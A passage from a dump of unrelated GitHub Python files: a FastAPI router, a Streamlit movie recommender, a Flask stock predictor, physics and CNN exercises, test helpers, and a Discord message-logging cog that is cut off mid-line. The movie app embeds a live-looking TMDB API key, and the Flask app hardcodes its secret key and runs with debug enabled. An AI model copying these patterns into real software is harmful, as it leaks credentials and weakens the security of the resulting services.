APIRouter()\n\n\n@router.get('mine_articles/published', description='Опубликованные статьи')\ndef m_published():\n art = Articles()\n res = art.user_pub()\n return JSONResponse(res)\n\n\n@router.get('mine_articles/unpublished', description='Неопубликованные статьи')\ndef m_unpublished():\n art = Articles()\n res = art.user_unpub()\n return JSONResponse(res)\n\n\n@router.get('all_articles/latest', description='Статьи, сортированные по дате создания')\ndef all_articles():\n art = Articles()\n res = art.sorted()\n return JSONResponse(res)\n\n\n@router.get('all_articles/by_id', description='Статья пользователя по id')\ndef article_id(user_id: int):\n art = Articles()\n res = art.user_id(user_id)\n return JSONResponse(res)\n\n\n@router.post('/create', description='Создание статьи')\ndef post_article(text: str, title: str = None, series: str = None, tags: str = None, publish: bool = None):\n art = Articles()\n res = art.create(text, title, series, tags, publish)\n return JSONResponse(\"Статья успешно создана!\")\n\n\n@router.post('/update', description='Обновление статьи')\ndef update_article(user_id: int, text: str, title: str = None, series: str = None, tags: str = None,\n publish: bool = None):\n art = Articles()\n res = art.update(user_id, text, title, series, tags, publish)\n return JSONResponse(\"Статья обновлена!\")\n","repo_name":"Dante-SSStyle/TestRequest","sub_path":"routers/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42818257256","text":"from turtle import left\nfrom urllib import response\nimport streamlit as st\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport requests\n\n# fetching data about the movie from the api\ndef fetch_poster(id):\n data=requests.get(f\"https://api.themoviedb.org/3/movie/{id}?api_key=8265bd1679663a7ea12ac168da84d2e8&language=en-US\")\n data=data.json()\n poster_data=\"https://image.tmdb.org/t/p/w500/\"+data['poster_path']\n return poster_data\n\n\n\n# page configuration\nst.set_page_config(page_title=\"Recommender\",layout='wide')\nst.title('Movie Recommendation System')\n\n# getting data from pickle file\nnewdata = pickle.load(open('new_movie_data.pkl','rb'))\nsimilarity=pickle.load(open('similarity.pkl','rb'))\nnewdata=pd.DataFrame(newdata)\n\n# recommendation function\ndef recommend(movie):\n movie_index=newdata[newdata['title']==movie].index[0]\n similar = similarity[movie_index]\n lst=sorted(list(enumerate(similar)),reverse=True,key = lambda x:x[1])\n l=[] \n poster=[]\n for i in lst[0:11]:\n movie_names=newdata.iloc[i[0]].title\n idd=newdata.iloc[i[0]].id\n poster.append(fetch_poster(idd))\n l.append(newdata.iloc[i[0]].title)\n return l,poster\n\n\n# selection box\nselected_movie=st.selectbox(\n 'Select your movie',\n newdata['title'].values\n)\n\n\n# button \nif st.button('Recommend'):\n names, poster= recommend(selected_movie)\n x=0\n for i in range(0, 2):\n cols = st.columns(5)\n cols[0].text(names[0+x])\n cols[0].image(poster[0+x])\n cols[1].text(names[1+x])\n cols[1].image(poster[1+x])\n cols[2].text(names[2+x])\n cols[2].image(poster[2+x])\n cols[3].text(names[3+x])\n cols[3].image(poster[3+x])\n cols[4].text(names[4+x])\n cols[4].image(poster[4+x])\n x=5\n '\\n'\n\n\n ","repo_name":"akr440/Recommender-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16341442535","text":"from flask import Flask\nfrom datetime import date\n\nfrom backend.RandomForestPredictor import RandomForestPredictor\nfrom backend.Stock import Stock\nfrom backend.StockLibrary import StockLibrary\nimport json\n\n# Server\nfrom backend.utils import update_database, read_database, stock_market_day\n\napp = Flask(__name__)\n\n# App\nstockLibrary = StockLibrary()\n\n\n@app.route('/predict_index', methods=['GET'])\ndef predict_index():\n curr_date = str(stock_market_day())\n result = read_database(curr_date)\n stockList = {}\n if result is None:\n stockLibrary.train()\n result = stockLibrary.createDirectionPredictions()\n update_database(json.dumps(result), curr_date)\n else:\n result = json.loads(result)\n for symbol in stockLibrary.symbolList:\n if symbol not in result:\n result[symbol] = predict_stock(symbol)\n stockList[symbol] = result[symbol]\n return json.dumps(stockList)\n\n@app.route('/predict_stock/', methods=['GET'])\ndef predict_stock(stock_symbol):\n curr_date = str(stock_market_day())\n result = json.loads(read_database(curr_date))\n\n if stock_symbol not in result:\n stock_history = Stock(stock_symbol).history\n predictor = RandomForestPredictor(stock_history)\n try:\n predictor.train()\n except:\n return {stock_symbol: -1}\n prediction = int(predictor.predict(predictor.data.iloc[-1][predictor.parameters].values.reshape(1, -1))[0])\n result[stock_symbol] = prediction\n update_database(json.dumps(result), curr_date)\n return {stock_symbol.upper(): result[stock_symbol]}\n\n@app.route('/get_all_predictions', methods=['GET'])\ndef get_all_stocks():\n curr_date = str(stock_market_day())\n return read_database(curr_date)\n\n@app.route('/get_stock_market_day', methods=['GET'])\ndef get_stock_market_day():\n return str(stock_market_day())\n\nif __name__ == \"__main__\":\n app.secret_key = '528491@JOKER'\n app.debug = True\n app.run()\n","repo_name":"sebastiaoh27/stock_predictor","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26728441898","text":"from random import randint\nfrom math import sqrt\nimport turtle\n\n#Рисуем рамку\nturtle.width(3)\nturtle.penup()\nturtle.goto(-300, 300)\nturtle.pendown()\nturtle.goto(-300, -300)\nturtle.goto(300, -300)\nturtle.goto(300, 300)\nturtle.goto(-300, 300)\n\n#Генерируем параметры черепашек\nnumber_of_turtles = 20\nsteps_of_time_number = 1000\ncoord = [[0] * 4 for i in range(number_of_turtles)]\ncounter = 0\n\nfor turtle_number in range(number_of_turtles):\n for i in range(2):\n coord[turtle_number][i] = randint(-280, 280)\n coord[turtle_number][i + 2] = randint(-10, 10)\n\npool = [turtle.Turtle(shape='circle') for i in range(number_of_turtles)]\nfor unit in pool:\n unit.penup()\n unit.speed(10)\n unit.goto(coord[counter][0], coord[counter][1])\n #unit.pendown()\n counter += 1\n\n\n\nfor i in range(steps_of_time_number):\n counter = 0\n for unit in pool:\n x_1 = coord[counter][0]\n y_1 = coord[counter][1]\n v_x_1 = coord[counter][2]\n v_y_1 = coord[counter][3]\n\n #Проверка на столкновение со стенкой\n if abs(x_1) >= 295:\n v_x_1 = -1 * v_x_1\n coord[counter][2] = v_x_1\n if abs(y_1) >= 295:\n v_y_1 = -1 * v_y_1\n coord[counter][3] = v_y_1\n #Проверка на столкновение с другой точкой\n for another_turtle_number in range(number_of_turtles):\n if another_turtle_number != counter:\n x_2 = coord[another_turtle_number][0]\n y_2 = coord[another_turtle_number][1]\n if sqrt((x_2 - x_1)**2 + (y_2 - y_1)**2) <= 20:\n v_x_2 = coord[another_turtle_number][2]\n v_y_2 = coord[another_turtle_number][3]\n\n #система до соударения\n p_1 = [v_x_1, v_y_1] #Вектор импульса первой точки\n p_2 = [v_x_2, v_y_2] #Вектор импульса второй точки\n p = [x_2 - x_1, y_2 - y_1]#Направляющий вектор прямой, соединяющей точки\n len_p = sqrt((x_2 - x_1)**2 + (y_2 - y_1)**2)\n s = [p[0] / len_p, p[1] / len_p] #Единичный направляющий вектор\n len_l_1 =(p_1[0] * p[0] + p_1[1] * p[1]) / len_p\n l_1 = [s[0] * len_l_1, s[1] * len_l_1] #Проекция p1 на прямую\n k_1 = [p_1[0] - l_1[0], p_1[1] - l_1[1]] #p1 - l1\n\n len_l_2 =(p_2[0] * p[0] + p_2[1] * p[1]) / len_p\n l_2 = [s[0] * len_l_2, s[1] * len_l_2] #Проекция p2 на прямую\n k_2 = [p_2[0] - l_2[0], p_2[1] - l_2[1]] #p2 - l2\n\n #Система после соударения\n p_1 = [l_2[0] + k_1[0], l_2[1] + k_1[1]]\n p_2 = [l_1[0] + k_2[0], l_1[1] + k_2[1]]\n\n v_x_1 = p_1[0]\n v_y_1 = p_1[1]\n coord[another_turtle_number][2] = p_2[0]\n coord[another_turtle_number][3] = p_2[1]\n\n unit.goto(x_1 + v_x_1, y_1 + v_y_1)\n coord[counter][0] = x_1 + v_x_1\n coord[counter][1] = y_1 + v_y_1\n coord[counter][2] = v_x_1\n coord[counter][3] = v_y_1\n counter += 1\n\n","repo_name":"SixroomSandwich/infa_2021_konyshev","sub_path":"Laba 2/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24775380709","text":"print('задача 5')\r\n_proceeds = int(input('Введите выручку фирмы '))\r\n_cost= int(input('Введите издержки '))\r\nif _proceeds > _cost:\r\n print('компания работает с прибылью')\r\n _profitability = True\r\nelse:\r\n print('компания несёт убытки')\r\n _profitability = False\r\nprint('задача 6')\r\nif _profitability == True and _proceeds!=0:\r\n _profit = (_proceeds-_cost)/_proceeds\r\n print('показатель рентабельности составил: ', _profit)\r\n _number_of_staff = int(input('Введите численность персонала '))\r\n _profit_per_person = (_proceeds-_cost)/_number_of_staff\r\n print('выручка на одного сотрудника составляет: ', _profit_per_person)","repo_name":"Pachuchka/Geekbrains_python","sub_path":"Lesson_1_task_5_task_6.py","file_name":"Lesson_1_task_5_task_6.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7324038127","text":"# EXAMPLE_PROCESS_DISTRACTORS Code to read and process 1M distractor images.\n#\n# More details about the revisited 1M distractors and evaluation can be found in:\n# Radenovic F., Iscen A., Tolias G., Avrithis Y., Chum O., Revisiting Oxford and Paris: Large-Scale Image Retrieval Benchmarking, CVPR 2018\n#\n# Authors: Radenovic F., Iscen A., Tolias G., Avrithis Y., Chum O., 2018\n\nimport os\nimport numpy as np\n\nfrom PIL import Image, ImageFile\n\nfrom dataset import configdataset\nfrom download import download_distractors\n\n#---------------------------------------------------------------------\n# Set data folder and testing parameters\n#---------------------------------------------------------------------\n\n# Set data folder, change if you have downloaded the data somewhere else\ndata_root = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'data')\n# Check, and, if necessary, download distractor dataset\ndownload_distractors(data_root)\n# Set up the dataset name\ndistractors_dataset = 'revisitop1m'\n\n#---------------------------------------------------------------------\n# Read images\n#---------------------------------------------------------------------\n\ndef pil_loader(path):\n # to avoid crashing for truncated (corrupted images)\n ImageFile.LOAD_TRUNCATED_IMAGES = True\n # open path as file to avoid ResourceWarning \n # (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert('RGB')\n\nprint('>> {}: Processing dataset...'.format(distractors_dataset)) \n# config file for the dataset\ncfg = configdataset(distractors_dataset, os.path.join(data_root, 'datasets'))\n\nfor i in np.arange(cfg['n']):\n im = pil_loader(cfg['im_fname'](cfg, i))\n ##------------------------------------------------------\n ## Perform image processing here, eg, feature extraction\n ##------------------------------------------------------\n print('>> {}: Processing image {}'.format(distractors_dataset, i+1))\n","repo_name":"filipradenovic/revisitop","sub_path":"python/example_process_distractors.py","file_name":"example_process_distractors.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"76"} +{"seq_id":"1572785709","text":"import os\nfrom copy import deepcopy\n\nfrom pcluster.schemas.cluster_schema import ClusterSchema\nfrom pcluster.utils import load_yaml_dict\n\n\ndef load_cluster_model_from_yaml(config_file_name, test_datadir=None):\n if test_datadir:\n path = test_datadir / config_file_name\n else:\n # If test_datadir is not specified, find configs in example_configs directory\n path = f\"{os.path.dirname(__file__)}/example_configs/{config_file_name}\"\n input_yaml = load_yaml_dict(path)\n print(input_yaml)\n copy_input_yaml = deepcopy(input_yaml)\n cluster = ClusterSchema(cluster_name=\"clustername\").load(copy_input_yaml)\n print(cluster)\n return input_yaml, cluster\n\n\ndef get_resources(\n generated_template: dict, name: str = None, type: str = None, properties: dict = None, deletion_policy: str = None\n):\n return dict(\n (res_name, res_value)\n for res_name, res_value in generated_template.get(\"Resources\", {}).items()\n if (name is None or res_name == name)\n and (type is None or res_value.get(\"Type\") == type)\n and (deletion_policy is None or res_value.get(\"DeletionPolicy\") == deletion_policy)\n and (\n properties is None\n or all(\n res_value.get(\"Properties\", {}).get(prop_name) == prop_value\n for prop_name, prop_value in properties.items()\n )\n )\n )\n","repo_name":"Quentin-M/aws-parallelcluster","sub_path":"cli/tests/pcluster/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"12485841403","text":"a = float(input(\"Enter C. you want to convert: \"))\r\n\r\n\r\ndef fh():\r\n b = float(a * (9/5)+32)\r\n\r\n return b\r\n\r\n\r\nferan = fh()\r\nprint(f\"{a} C. is equal to {feran} feranhit.\")","repo_name":"Jimil-Joshi/FSDS_Python_Assignments","sub_path":"Assignment_2(2).py","file_name":"Assignment_2(2).py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"69807501365","text":"import numpy as np\n\nclass CNN:\n\n def __init__(self, num_kernels, pool_size, out_nodes, seed):\n self.kernels = self.Kernels(num_kernels) # 8x8x1 to 6x6x10\n # TODO add pooling initialization\n # self.pool = self.Pool(pool_size) # 6x6x10 to 3x3x10\n # TODO change sigmoid to relu\n self.sigmoid = self.ReLu(6 * 6 * num_kernels, out_nodes) # 6x6x10 to 10\n np.random.seed(seed)\n\n class Kernels:\n # TODO possibly add bias forward and backprop to kernel outputs\n # The set of kernels and kernel functions\n\n def __init__(self, num_kernels):\n self.num_kernels = num_kernels\n self.size_kernel = 3\n self.kernels = np.random.randn(num_kernels, 3, 3) / (self.size_kernel ** 2)\n\n def forward(self, x):\n self.cur_x = x\n\n height, width = x.shape\n result = np.zeros((height - 2, width - 2, self.num_kernels))\n\n for i in range(height-2):\n for j in range(width-2):\n block = x[i:(i+3), j:(j+3)]\n result[i,j] = np.sum(block * self.kernels, axis=(1, 2))\n return result\n\n def back(self, delta_cnn, alpha):\n # TODO change size to recieve backprop from pool size\n height, width = self.cur_x.shape\n dk = np.zeros(self.kernels.shape)\n delta_cnn = delta_cnn.reshape(height-2, width-2,self.num_kernels)\n for i in range(height - 2):\n for j in range(width - 2):\n block_x = self.cur_x[i:(i+3), j:(j+3)]\n # block_delta = delta_cnn[i:(i+3), j:(j+3)]\n for k in range(self.num_kernels):\n dk[k] += delta_cnn[i,j,k] * block_x\n\n self.kernels += -alpha * dk\n\n\n class Pool:\n # use max pooling with size 2x2\n def __init__(self, pool_size):\n self.dim = pool_size # size of the pool\n\n def forward(self, x):\n self.cur_input = x\n height, width, num_k = x.shape\n result = np.zeros((height // 2, width // 2, num_k))\n for i in range(height // 2):\n for j in range(width // 2):\n block = x[(i*2):(i*2+2), (j*2):(j*2+2)]\n result[i,j] = np.amax(block, axis=(0,1))\n return result\n\n def back(self, delta_pool):\n # TODO recieve from output size\n height, width, num_k = self.cur_input.shape\n delta_pool = delta_pool.reshape((height//2, width//2, num_k))\n delta_cnn = np.zeros((height, width, num_k))\n\n for i in range(height // 2):\n for j in range(width // 2):\n block = self.cur_input[(i*2):(i*2+2),(j*2):(j*2+2)]\n b_h, b_w, b_k = block.shape\n maximum = np.amax(block, axis=(0,1))\n for s in range(b_h):\n for t in range(b_w):\n for u in range(b_k):\n if block[s, t, u] == maximum[u]:\n delta_cnn[i*2+s, j*2+t, u] = delta_pool[i,j,u]\n return delta_cnn\n\n\n class ReLu:\n # Use a fully connected layer using sigmoid activation\n\n def __init__(self, in_nodes, out_nodes):\n self.w = np.random.randn(out_nodes, in_nodes) / in_nodes\n self.b = np.zeros((out_nodes, 1))\n\n def f(self, z):\n return np.where(z > 0, z, 0)\n\n def d_f(self, z):\n test = np.where(z>0, 1.0, 0.0)\n return np.where(z>0, 1.0, 0.0)\n\n def loss(self, y, yhat):\n self.y_vector = np.zeros((len(yhat), 1))\n self.y_vector[y, 0] = 1.0\n loss = np.linalg.norm(self.y_vector - yhat)\n accuracy = 1 if np.argmax(yhat[:, 0]) == y else 0\n return loss, accuracy\n\n def forward(self, x):\n # TODO setup to receive pool size\n self.z_cnn = x.reshape(-1, 1)\n self.a_cnn = self.f(self.z_cnn)\n\n self.z_out = np.matmul(self.w, self.a_cnn) + self.b\n self.a_out = self.f(self.z_out)\n\n return self.a_out\n\n def back(self, alpha):\n\n w_grad = np.zeros(self.w.shape)\n b_grad = np.zeros(self.b.shape)\n\n # get delta for out layer\n delta_out = -(self.y_vector - self.a_out) * self.d_f(self.z_out)\n\n # get delta for hidden layer\n delta_pool = np.dot(self.w.T, delta_out) * self.d_f(self.z_cnn)\n\n w_grad += -alpha * np.matmul(delta_out, self.a_cnn.T)\n b_grad += -alpha * delta_out\n\n return delta_pool\n\n\n\n","repo_name":"aobject/NYU-ML-Project-resnet-dev","sub_path":"utils/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40486656583","text":"import discord\nfrom discord.ext import commands\nfrom datetime import datetime\n#from bot import checkIfRuleBroke\nfrom cogs.moderation import checkIfRuleBroke\n\n# Moderator Logs\nmodLogID = 827246800342745149\nmemberLogID = 827246948884283423\nuserLogID = 827246964453146665\nuserVoiceLogID = 827246989732610129\nmodVoiceLogID = 827247013472763914\nassignedRoleLogID = 827247035949514802\nmessageLogID = 827247073656045639\nsentMessageLogID = 827247088936157214\ntypingLogID = 827345082540621905\nreactionLogID = 827247050470064181\n\n# Administrator Logs\ndiscordModerationLogID = 827246814616617006\nchannelLogID = 827247195790508062\nmodRoleLogID = 827247213829685259\nrestrictMessageLogID = 827247239088177212\nrestrictSentMessageLogID = 827247263607816212\nrestrictTypingLogID = 827345162429661216\nrestrictReactionLogID = 827262769786650625\nserverLogID = 827247290329726986\notherLogID = 827247308902105150\n\n# Roles to move to restrict message log\nrestrictRoles = [558818974230511672, 558818939082375199, 826547399429193739]\n\n\nclass logs(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n # @commands.command() Instead of @client.command()\n # @commands.Cog.listener() Instead of @client.event\n\n def checkIfRestricted(self, roles):\n for role in roles:\n for restrict in restrictRoles:\n if role.id == restrict:\n return 0\n\n # For initial creation of channel.\n # Will return array or arrays, for embed. Name and Value\n def getChannelPerms(self, perms):\n allPerms = ['add_reactions',\n 'administrator',\n 'attach_files',\n 'ban_members',\n 'change_nickname',\n 'connect',\n 'create_instant_invite',\n 'deafen_members',\n 'embed_links',\n 'external_emojis',\n 'kick_members',\n 'manage_channels',\n 'manage_emojis',\n 'manage_guild',\n 'manage_messages',\n 'manage_nicknames',\n 'manage_permissions',\n 'manage_roles',\n 'manage_webhooks',\n 'mention_everyone',\n 'move_members',\n 'mute_members',\n 'priority_speaker',\n 'read_message_history',\n 'read_messages',\n 'request_to_speak',\n 'send_messages',\n 'send_tts_messages',\n 'speak',\n 'stream',\n 'use_external_emojis',\n 'use_slash_commands',\n 'use_voice_activation',\n 'view_audit_log',\n 'view_channel',\n 'view_guild_insights']\n\n errors = 0\n j = 0\n nextPerm = [[None] * 2 for _ in range(len(perms))]\n for key in perms:\n i = 0\n nextPerm[j][0] = f'{key}'\n nextPerm[j][1] = \"\"\n for perm in perms[key].pair():\n for title in allPerms:\n try:\n if i == 0 and getattr(perm, title):\n nextPerm[j][1] += f':white_check_mark: {title}\\n'\n elif i == 1 and getattr(perm, title):\n nextPerm[j][1] += f':x: {title}\\n'\n except:\n errors += 1\n i += 1\n j += 1\n return nextPerm\n\n # Split between #typing-log and #restrict-typing-log\n @commands.Cog.listener()\n async def on_typing(self, channel, user, when):\n if not user.bot:\n logChannel = self.client.get_channel(typingLogID)\n result = self.checkIfRestricted(user.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictTypingLogID)\n embedVar = discord.Embed(title=f'User {user}', description=f'{user.mention} Has started typing in <#{channel.id}>.', color=2575039)\n embedVar.set_author(name=\"User typing\", icon_url=\"https://cdn.icon-icons.com/icons2/933/PNG/512/keyboard-right-arrow-button-1_icon-icons.com_72690.png\")\n embedVar.set_footer(text=f'Typing started at {when}')\n embedVar.set_thumbnail(url=f'{user.avatar_url}')\n await logChannel.send(embed=embedVar)\n\n # Split between #sent-message-log #restrict-sent-message-log\n @commands.Cog.listener()\n async def on_message(self, message):\n if not message.author.bot:\n logChannel = self.client.get_channel(sentMessageLogID)\n result = self.checkIfRestricted(message.author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictSentMessageLogID)\n embedVar = discord.Embed(title=f'User {message.author}', description=f'{message.author.mention} Sent a message in channel <#{message.channel.id}>. {message.jump_url}', color=65302)\n embedVar.set_author(name=\"Message Sent\", icon_url=\"https://icon-icons.com/downloadimage.php?id=122510&root=1946/PNG/512/&file=1904660-email-envelope-letter-mail-message-post-send_122510.png\")\n embedVar.set_footer(text=f'Message sent at {message.created_at}')\n embedVar.set_thumbnail(url=f'{message.author.avatar_url}')\n embedVar.add_field(name=\"Content:\", value=f'{message.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Split between #message-log and #restrict-message-log\n @commands.Cog.listener()\n async def on_message_delete(self, message):\n if not message.author.bot:\n logChannel = self.client.get_channel(messageLogID)\n result = self.checkIfRestricted(message.author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictMessageLogID)\n embedVar = discord.Embed(title=f'User {message.author}', description=f'A message sent by {message.author.mention} has been deleted in <#{message.channel.id}>.', color=16714507)\n embedVar.set_author(name=\"Message Deleted\", icon_url=\"https://cdn.icon-icons.com/icons2/10/PNG/256/remove_delete_exit_close_1545.png\")\n embedVar.set_thumbnail(url=f'{message.author.avatar_url}')\n embedVar.add_field(name=\"Content:\", value=f'{message.content}', inline=False)\n\n # Assigned who deleted the message is way too difficult\n if checkIfRuleBroke(self, message):\n embedVar.set_footer(text=f'Message sent at {message.created_at}\\nMessage deleted at {datetime.utcnow()}\\nResponsible User (guess): HackUCF Bot -- AutoMod')\n else:\n hit = 0\n async for entry in message.guild.audit_logs(action=discord.AuditLogAction.message_delete):\n try:\n if entry.target == message.author and entry.extra.channel == message.channel and (abs((datetime.utcnow() - entry.created_at)).total_seconds() / 60.0) < 5:\n embedVar.set_footer(text=f'Message sent at {message.created_at}\\nMessage deleted at {datetime.utcnow()}\\nResponsible User (guess): {entry.user}')\n hit = 1\n break\n except:\n pass\n if hit == 0:\n embedVar.set_footer(text=f'Message sent at {message.created_at}\\nMessage deleted at {datetime.utcnow()}\\nResponsible User (guess): {message.author}')\n\n await logChannel.send(embed=embedVar)\n\n # Split between #message-log and #restrict-message-log\n @commands.Cog.listener()\n async def on_bulk_message_delete(self, messages):\n # Shouldn't matter if message was from bot or not\n logChannel = self.client.get_channel(messageLogID)\n result = self.checkIfRestricted(messages[0].author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictMessageLogID)\n embedVar = discord.Embed(title=f'{len(messages)} messages', description=f'A bulk message deletion occurred. {len(messages)} messages have been deleted in <#{messages[0].channel.id}>.', color=16714507)\n embedVar.set_author(name=\"Bulk Message Deletion\", icon_url=\"https://cdn.icon-icons.com/icons2/10/PNG/256/remove_delete_exit_close_1545.png\")\n for message in messages:\n embedVar.add_field(name=f'Author: {message.author}', value=f'Contents: {message.content}', inline=False)\n\n embedVar.set_footer(text=f'Messages deleted at {datetime.utcnow()}')\n await logChannel.send(embed=embedVar)\n\n # Split between #message-log and #restrict-message-log\n # BUG: Messages of length > 1024 will cause error. Embeds are limited to 1024 characters.\n @commands.Cog.listener()\n async def on_message_edit(self, before, after):\n if not before.author.bot:\n unknownEmbedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> has been edited. {after.jump_url}\\n Here is what we know:', color=2575039)\n unknownEmbedVar.set_author(name=\"Message Edited (Raw Data)\", icon_url=\"https://cdn.icon-icons.com/icons2/66/PNG/128/system_unknown_13010.png\")\n unknownEmbedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n unknownEmbedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n\n if before.activity != after.activity:\n unknownEmbedVar.add_field(name=\"activity changed: \", value=f'Before: {before.activity}\\nAfter: {after.activity}', inline=False)\n\n if before.application != after.application:\n unknownEmbedVar.add_field(name=\"application changed: \", value=f'Before: {before.application}\\nAfter: {after.application}', inline=False)\n\n if before.attachments != after.attachments:\n unknownEmbedVar.add_field(name=\"attachments changed: \", value=f'Before: {before.attachments}\\nAfter: {after.attachments}', inline=False)\n\n if before.channel != after.channel:\n unknownEmbedVar.add_field(name=\"channel changed: \", value=f'Before: {before.channel}\\nAfter: {after.channel}', inline=False)\n\n if before.channel_mentions != after.channel_mentions:\n unknownEmbedVar.add_field(name=\"channel_mentions changed: \", value=f'Before: {before.channel_mentions}\\nAfter: {after.channel_mentions}', inline=False)\n\n if before.created_at != after.created_at:\n unknownEmbedVar.add_field(name=\"created_at changed: \", value=f'Before: {before.created_at}\\nAfter: {after.created_at}', inline=False)\n\n if before.edited_at != after.edited_at:\n unknownEmbedVar.add_field(name=\"edited_at changed: \", value=f'Before: {before.edited_at}\\nAfter: {after.edited_at}', inline=False)\n\n if before.flags != after.flags:\n unknownEmbedVar.add_field(name=\"flags changed: \", value=f'Before: {before.flags}\\nAfter: {after.flags}', inline=False)\n\n if before.flags.value != after.flags.value:\n unknownEmbedVar.add_field(name=\"flags.value changed: \", value=f'Before: {before.flags.value}\\nAfter: {after.flags.value}', inline=False)\n\n if before.flags.is_crossposted != after.flags.is_crossposted:\n unknownEmbedVar.add_field(name=\"flags.is_crossposted changed: \", value=f'Before: {before.flags.is_crossposted}\\nAfter: {after.flags.is_crossposted}', inline=False)\n\n if before.flags.source_message_deleted != after.flags.source_message_deleted:\n unknownEmbedVar.add_field(name=\"flags.source_message_deleted changed: \", value=f'Before: {before.flags.source_message_deleted}\\nAfter: {after.flags.source_message_deleted}', inline=False)\n\n if before.flags.urgent != after.flags.urgent:\n unknownEmbedVar.add_field(name=\".flags.urgent changed: \", value=f'Before: {before.flags.urgent}\\nAfter: {after.flags.urgent}', inline=False)\n\n if before.guild != after.guild:\n unknownEmbedVar.add_field(name=\"guild changed: \", value=f'Before: {before.guild}\\nAfter: {after.guild}', inline=False)\n\n if before.id != after.id:\n unknownEmbedVar.add_field(name=\"id changed: \", value=f'Before: {before.id}\\nAfter: {after.id}', inline=False)\n\n if before.jump_url != after.jump_url:\n unknownEmbedVar.add_field(name=\"jump_url changed: \", value=f'Before: {before.jump_url}\\nAfter: {after.jump_url}', inline=False)\n\n if before.mention_everyone != after.mention_everyone:\n unknownEmbedVar.add_field(name=\"mention_everyone changed: \", value=f'Before: {before.mention_everyone}\\nAfter: {after.mention_everyone}', inline=False)\n\n if before.mentions != after.mentions:\n unknownEmbedVar.add_field(name=\"mentions changed: \", value=f'Before: {before.mentions}\\nAfter: {after.mentions}', inline=False)\n\n if before.nonce != after.nonce:\n unknownEmbedVar.add_field(name=\"nonce changed: \", value=f'Before: {before.nonce}\\nAfter: {after.nonce}', inline=False)\n\n if before.raw_channel_mentions != after.raw_channel_mentions:\n unknownEmbedVar.add_field(name=\"raw_channel_mentions changed: \", value=f'Before: {before.raw_channel_mentions}\\nAfter: {after.raw_channel_mentions}', inline=False)\n\n if before.raw_mentions != after.raw_mentions:\n unknownEmbedVar.add_field(name=\"raw_mentions changed: \", value=f'Before: {before.raw_mentions}\\nAfter: {after.raw_mentions}', inline=False)\n\n if before.raw_role_mentions != after.raw_role_mentions:\n unknownEmbedVar.add_field(name=\"raw_role_mentions changed: \", value=f'Before: {before.raw_role_mentions}\\nAfter: {after.raw_role_mentions}', inline=False)\n\n if before.reactions != after.reactions:\n unknownEmbedVar.add_field(name=\"reactions changed: \", value=f'Before: {before.reactions}\\nAfter: {after.reactions}', inline=False)\n\n if before.reference != after.reference:\n unknownEmbedVar.add_field(name=\"reference changed: \", value=f'Before: {before.reference}\\nAfter: {after.reference}', inline=False)\n\n if before.role_mentions != after.role_mentions:\n unknownEmbedVar.add_field(name=\"role_mentions changed: \", value=f'Before: {before.role_mentions}\\nAfter: {after.role_mentions}', inline=False)\n\n if before.stickers != after.stickers:\n unknownEmbedVar.add_field(name=\"stickers changed: \", value=f'Before: {before.stickers}\\nAfter: {after.stickers}', inline=False)\n\n if before.tts != after.tts:\n unknownEmbedVar.add_field(name=\"tts changed: \", value=f'Before: {before.tts}\\nAfter: {after.tts}', inline=False)\n\n if before.type != after.type:\n unknownEmbedVar.add_field(name=\"type changed: \", value=f'Before: {before.type}\\nAfter: {after.type}', inline=False)\n\n if before.webhook_id != after.webhook_id:\n unknownEmbedVar.add_field(name=\"webhook_id changed: \", value=f'Before: {before.webhook_id}\\nAfter: {after.webhook_id}', inline=False)\n\n logChannel = self.client.get_channel(messageLogID)\n result = self.checkIfRestricted(before.author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictMessageLogID)\n\n hits = 0\n # BUG: Embeds have to be 1024 characters or less, discord allows messages of up to 2000 characters. A large messages fails to create an embed\n if before.content != after.content:\n hits += 1\n embedVar = discord.Embed(title=f'User {before.author}', description=f'{before.author.mention} Has edited a message in <#{before.channel.id}>. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message Content Edited\", icon_url=\"https://cdn.icon-icons.com/icons2/624/PNG/512/Create_New-80_icon-icons.com_57345.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {after.edited_at}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Before:\", value=f'{before.content}', inline=False)\n embedVar.add_field(name=\"After:\", 